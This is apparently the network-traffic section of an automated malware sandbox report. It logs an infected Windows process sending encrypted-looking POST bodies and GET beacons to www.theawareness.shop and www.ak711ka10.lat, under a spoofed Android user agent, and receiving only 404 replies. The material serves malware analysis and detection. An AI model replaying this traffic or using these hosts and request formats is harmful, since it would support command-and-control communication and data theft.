                                                                                                                                          Data Raw: 6e 38 43 30 3d 76 52 75 77 31 76 62 6e 74 53 7a 65 50 37 34 50 79 58 45 4a 79 4c 67 79 31 6b 75 64 54 48 42 69 6d 4e 6b 41 41 66 79 31 4e 6a 48 33 56 4c 76 47 54 32 77 6d 68 43 69 51 58 39 56 42 35 43 35 61 68 46 4e 73 52 53 69 55 37 48 65 6a 39 38 61 76 4d 52 4d 55 72 42 62 65 4c 6b 78 6c 46 57 78 6b 51 53 5a 71 4a 31 6b 6b 4e 4b 62 74 45 47 55 50 69 6f 2b 56 78 68 50 44 43 61 44 4b 33 53 6a 63 4a 4f 56 6a 74 70 33 61 70 78 6e 51 6a 33 46 32 42 4c 63 73 49 46 66 30 58 41 72 4f 41 49 6b 76 6d 43 62 57 33 34 37 69 4d 67 52 6d 7a 4e 55 51 59 36 48 45 58 76 69 70 6b 59 46 49 48 69 73 77 61 67 3d 3d
                                                                                                                                          Data Ascii: n8C0=vRuw1vbntSzeP74PyXEJyLgy1kudTHBimNkAAfy1NjH3VLvGT2wmhCiQX9VB5C5ahFNsRSiU7Hej98avMRMUrBbeLkxlFWxkQSZqJ1kkNKbtEGUPio+VxhPDCaDK3SjcJOVjtp3apxnQj3F2BLcsIFf0XArOAIkvmCbW347iMgRmzNUQY6HEXvipkYFIHiswag==
                                                                                                                                          Nov 14, 2024 16:29:59.959435940 CET875INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:59 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FwE%2BoCxkUEXKUJPlZjKxD6pqjoPZcpcYh4qLd4paxFhg7YzrOrlm%2F9hWLguqVjp3tVImWGPEidXYnB4EnluE0Mz1MY%2Fli2V7Ere1ZWDXCDnwTN89pCRohl8ZWsjyVQOtrkQ4UhvvJM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e280a4c9d7ae779-DFW
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1348&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=685&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                          Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 190


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          30192.168.2.450032172.67.177.22080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:01.797724009 CET705OUTPOST /df5c/ HTTP/1.1
                                                                                                                                          Host: www.theawareness.shop
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.theawareness.shop
                                                                                                                                          Referer: http://www.theawareness.shop/df5c/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 76 52 75 77 31 76 62 6e 74 53 7a 65 4a 6f 67 50 30 77 51 4a 36 4c 67 7a 70 55 75 64 59 6e 42 6d 6d 4e 6f 41 41 62 4b 6c 4e 77 6a 33 56 75 54 47 53 33 77 6d 76 69 69 51 5a 64 56 45 30 69 35 52 68 46 41 47 52 54 75 55 37 48 4b 6a 39 2b 53 76 4d 6d 34 58 74 52 62 63 66 55 78 6e 4c 32 78 6b 51 53 5a 71 4a 78 45 43 4e 4d 7a 74 59 6c 63 50 69 4e 4b 61 38 42 50 41 53 71 44 4b 7a 53 69 58 4a 4f 55 4f 74 72 54 38 70 33 6a 51 6a 7a 42 32 42 66 49 7a 52 31 65 78 5a 67 71 59 45 4b 68 41 76 53 62 64 34 5a 4c 45 4e 44 78 64 79 4c 5a 4b 4a 4c 6d 54 46 76 47 61 35 66 4d 38 4b 68 52 35 42 72 5a 75 51 47 32 34 66 52 75 70 34 67 30 66 38 44 33 51 51 5a 55 3d
                                                                                                                                          Data Ascii: n8C0=vRuw1vbntSzeJogP0wQJ6LgzpUudYnBmmNoAAbKlNwj3VuTGS3wmviiQZdVE0i5RhFAGRTuU7HKj9+SvMm4XtRbcfUxnL2xkQSZqJxECNMztYlcPiNKa8BPASqDKzSiXJOUOtrT8p3jQjzB2BfIzR1exZgqYEKhAvSbd4ZLENDxdyLZKJLmTFvGa5fM8KhR5BrZuQG24fRup4g0f8D3QQZU=
                                                                                                                                          Nov 14, 2024 16:30:02.741549015 CET871INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:02 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0llpqkA%2FTAwZFbksLlzTbj5qR2ADcjR2524s1VPBEJKWrs33i6Pm8js2MKVDB6rbgaTqkTavckumynO2hmyH0CXPBOlVINuhKFqbbdgzU90ol2lqMqL80RsIAu5SZseiOXcjbwoOi80%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e280a5c7adf6c4c-DFW
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=705&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                          Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 190


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          31192.168.2.450033172.67.177.22080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:04.341108084 CET10787OUTPOST /df5c/ HTTP/1.1
                                                                                                                                          Host: www.theawareness.shop
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.theawareness.shop
                                                                                                                                          Referer: http://www.theawareness.shop/df5c/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 76 52 75 77 31 76 62 6e 74 53 7a 65 4a 6f 67 50 30 77 51 4a 36 4c 67 7a 70 55 75 64 59 6e 42 6d 6d 4e 6f 41 41 62 4b 6c 4e 77 72 33 56 38 72 47 54 55 6f 6d 75 69 69 51 47 74 56 2f 30 69 35 4d 68 45 6f 64 52 54 79 75 37 45 79 6a 2f 62 47 76 4b 53 6b 58 6b 52 62 63 41 45 78 69 46 57 78 78 51 53 49 43 4a 31 6f 43 4e 4d 7a 74 59 6c 77 50 72 34 2b 61 2b 42 50 44 43 61 44 47 33 53 6a 77 4a 4f 64 37 74 72 57 48 70 48 44 51 6a 58 6c 32 44 73 67 7a 4f 46 65 7a 61 67 71 51 45 4c 64 66 76 53 57 6b 34 5a 2f 2b 4e 45 42 64 77 66 6b 49 5a 6f 65 77 59 38 2f 4a 76 59 77 5a 54 44 42 4b 61 6f 6c 71 58 57 6d 4d 44 67 79 58 77 42 64 6d 6c 77 72 75 4c 73 6a 55 76 74 4c 30 39 45 58 48 48 73 56 49 32 42 61 4a 30 58 2b 62 65 59 54 2b 4f 68 74 6a 4e 49 42 6e 30 42 67 4b 5a 75 42 4c 44 4c 70 59 67 67 54 32 32 65 42 70 55 68 73 62 57 4b 73 6c 4b 6e 75 52 6d 51 7a 59 35 43 72 43 31 50 72 6b 73 50 6b 78 66 62 38 35 75 76 30 4d 6e 2b 64 52 38 4f 54 4b 6e 6a 70 79 54 75 6e 76 42 69 34 77 47 51 34 65 74 46 43 2f 70 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=vRuw1vbntSzeJogP0wQJ6LgzpUudYnBmmNoAAbKlNwr3V8rGTUomuiiQGtV/0i5MhEodRTyu7Eyj/bGvKSkXkRbcAExiFWxxQSICJ1oCNMztYlwPr4+a+BPDCaDG3SjwJOd7trWHpHDQjXl2DsgzOFezagqQELdfvSWk4Z/+NEBdwfkIZoewY8/JvYwZTDBKaolqXWmMDgyXwBdmlwruLsjUvtL09EXHHsVI2BaJ0X+beYT+OhtjNIBn0BgKZuBLDLpYggT22eBpUhsbWKslKnuRmQzY5CrC1PrksPkxfb85uv0Mn+dR8OTKnjpyTunvBi4wGQ4etFC/pyLxvVz+CLT578J6+4iVi3V+RgEDQXnCcp/asV50ivCrRiImvnv4RDZM3vS6JndlD4VvK3EI6FDClWzN2fwGC3FMhVIDBuDzINajn47fVq9Av+tGwOCuZ5KyTbyDo4ehE+CRoO6tmiBFT11hdncywmvWxB95S0axYnwiQJn04ZBA2Zwi2qh1D/K5qYPcMDU9OSHOoqRqzcNI1hxLuGuPOOChpiYv9SVbOtPWMKKMC1uDRjxnhgeSYejClyeS9q5VFZQlBPTPJBjAZPOA0/ssQX9yzISOXgJm07jwmX1QzxbnEpKk+2qKvXU5mB6XP4mJ9E8HnR3b+eiNu4XrT9T/owApGQxWgUgsFulZ5Uo0xkL/Sg+K/HQ+1fMyKp/6LPinE9JfKW7n4/0JJAO26X3dG6bKkUPIW4nLtW/+40CLx+eE9E14OY/TN0VcBGDIv5zaSQ9jZKgtEfzx2L5lIpRHGc4jJtss2q8U5qRgNxCkpQs0sAePtcIXglj0APHSvOL/sWwsrtrox3Kad1VLjDiFObplPRC2Bhv+df9CeaE3FIzZ+RBUuL/xuV/Xcg8s1OV0GOYnd36T0JnprAhfrntfTXiUh6kAV5xg4io/SXx2O3IOMeRMqXFPSdt9K2LOoq6U5cil0+B7Ch3KFzm+f6Y9zxr515iL6ErWwsp [TRUNCATED]
                                                                                                                                          Nov 14, 2024 16:30:05.285464048 CET884INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:05 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJ%2B3Yp2XLrqmDO1CZZCLi6hE%2FoClQted0Y0s4zA99oPKxrWw9006VgpK73xu4NmSe%2FwrQzJ%2BOBjU1bdJXJPr4VKkSpMjmM%2F3Zuxps%2Fatz0ojkRjOnmsvALSSj94pRqIrLL53aDi3pHs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e280a6c6af06996-DFW
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10787&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                          Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 190


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          32192.168.2.450034172.67.177.22080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:06.888783932 CET416OUTGET /df5c/?vva=cTUXfXqHQ4cd-Hh0&n8C0=iTGQ2f3/8wLaRYQM7RYk7LBI2CmVUG8/oLVVEoegdR+OVsnqcEQj6iurR8BAvDospkEZVkGP6nTG7c6sAiwUtE7HJkZ3OwJdQgVkFyZkHOTqemIeuqLMyHg= HTTP/1.1
                                                                                                                                          Host: www.theawareness.shop
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:30:07.608331919 CET822INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:07 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5PuocNzb0Rjcst5nDRGQs9GTOY%2FcETRd61QuqRFbj%2F7Ma5RNEjO9lXPdxz01pkTdzwvVwM5RjnQ%2FiSEEVGuW90foW25RHBZZAW91jTAjHLh%2FGC9tc7CUlWGTS5MwQWvfnT19f3JqZI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e280a7c4ecb4662-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=416&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          33192.168.2.450035154.23.181.780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:12.688956022 CET673OUTPOST /o5z9/ HTTP/1.1
                                                                                                                                          Host: www.ak711ka10.lat
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.ak711ka10.lat
                                                                                                                                          Referer: http://www.ak711ka10.lat/o5z9/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 2b 33 64 66 2f 2b 4a 49 6b 79 41 4c 70 42 77 6f 6a 6d 51 31 6c 36 68 35 4a 58 50 4d 55 66 4f 68 4d 41 4c 30 4b 44 45 47 45 7a 2b 36 4a 42 31 43 39 71 37 44 45 69 4b 61 35 2b 50 74 30 41 71 52 76 72 56 4c 31 77 48 36 55 56 6f 4b 34 55 67 50 58 38 39 69 62 37 54 53 41 79 57 79 65 46 57 7a 69 71 6c 73 51 61 5a 65 42 41 43 53 2b 70 65 6e 6a 56 38 2b 62 33 77 72 55 52 50 42 65 79 4b 63 30 4a 6d 74 56 57 30 30 6d 58 67 71 45 61 4a 59 6d 57 51 44 51 42 7a 64 66 5a 6d 30 70 51 43 4b 49 75 49 6a 69 52 76 66 53 31 72 66 31 67 34 79 43 34 33 4b 41 49 64 44 35 57 77 76 5a 37 79 45 36 41 3d 3d
                                                                                                                                          Data Ascii: n8C0=+3df/+JIkyALpBwojmQ1l6h5JXPMUfOhMAL0KDEGEz+6JB1C9q7DEiKa5+Pt0AqRvrVL1wH6UVoK4UgPX89ib7TSAyWyeFWziqlsQaZeBACS+penjV8+b3wrURPBeyKc0JmtVW00mXgqEaJYmWQDQBzdfZm0pQCKIuIjiRvfS1rf1g4yC43KAIdD5WwvZ7yE6A==
                                                                                                                                          Nov 14, 2024 16:30:14.506201982 CET691INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 548
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                          Nov 14, 2024 16:30:14.506505966 CET691INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 548
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                          Nov 14, 2024 16:30:14.506896973 CET691INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 548
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          34192.168.2.450036154.23.181.780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:15.317095995 CET693OUTPOST /o5z9/ HTTP/1.1
                                                                                                                                          Host: www.ak711ka10.lat
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.ak711ka10.lat
                                                                                                                                          Referer: http://www.ak711ka10.lat/o5z9/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 2b 33 64 66 2f 2b 4a 49 6b 79 41 4c 70 68 67 6f 69 46 6f 31 6a 61 68 32 47 33 50 4d 64 2f 50 4a 4d 42 33 30 4b 42 6f 57 44 42 61 36 49 6b 5a 43 79 50 58 44 42 69 4b 61 32 65 50 6f 35 67 71 6b 76 72 70 31 31 31 2f 36 55 56 55 4b 34 52 45 50 51 4c 4a 74 62 72 54 63 4e 53 57 77 44 31 57 7a 69 71 6c 73 51 61 4d 37 42 41 71 53 2b 5a 75 6e 69 77 51 39 53 58 77 6f 64 78 50 42 4a 69 4b 59 30 4a 6d 62 56 58 6f 4e 6d 56 49 71 45 59 52 59 68 48 51 41 65 42 7a 66 48 35 6e 6d 68 43 2f 7a 50 74 39 79 72 67 48 77 56 57 33 4d 35 47 31 6f 54 4a 57 64 53 49 35 77 6b 52 35 62 55 34 50 4e 68 43 4e 30 45 6a 57 77 51 6d 66 5a 30 39 63 58 4b 2b 37 64 33 6c 34 3d
                                                                                                                                          Data Ascii: n8C0=+3df/+JIkyALphgoiFo1jah2G3PMd/PJMB30KBoWDBa6IkZCyPXDBiKa2ePo5gqkvrp111/6UVUK4REPQLJtbrTcNSWwD1WziqlsQaM7BAqS+ZuniwQ9SXwodxPBJiKY0JmbVXoNmVIqEYRYhHQAeBzfH5nmhC/zPt9yrgHwVW3M5G1oTJWdSI5wkR5bU4PNhCN0EjWwQmfZ09cXK+7d3l4=
                                                                                                                                          Nov 14, 2024 16:30:16.188601971 CET691INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 548
                                                                                                                                          Connection: close
